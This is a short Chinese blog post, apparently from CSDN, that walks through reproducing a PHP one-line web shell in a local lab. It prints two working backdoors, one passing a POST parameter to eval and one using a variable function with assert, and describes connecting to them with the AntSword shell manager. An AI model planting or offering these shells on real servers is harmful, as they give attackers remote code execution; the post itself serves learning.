当前位置：网站首页>复现php一句话木马

复现php一句话木马

2022-07-26 10:55:00 【熬夜且瞌睡】

在phpstudy-pro中，开启apache，MySQL，在WWW目录中创建php文件，在该php文件中进行代码的编写

<?php
eval($_POST['2']);
?>

打开中国蚁剑测试

输入测试的本地地址，连接密码输入2，编码格式选择base64，点击测试连接

当显示连接成功时，点击添加，双击添加的那条记录，看见网站内容和目录结构，代表已经和成功了。

修改一下php文件

<?php
$_POST['1']($_POST['2']);
?>

eval的规则：eval是一个语言构造器，他不是一个函数，所以不能被可变函数进行调用。

使用assert；assert也可以执行任意命令，

显示连接成功。

版权声明
本文为[熬夜且瞌睡]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_50646296/article/details/125959068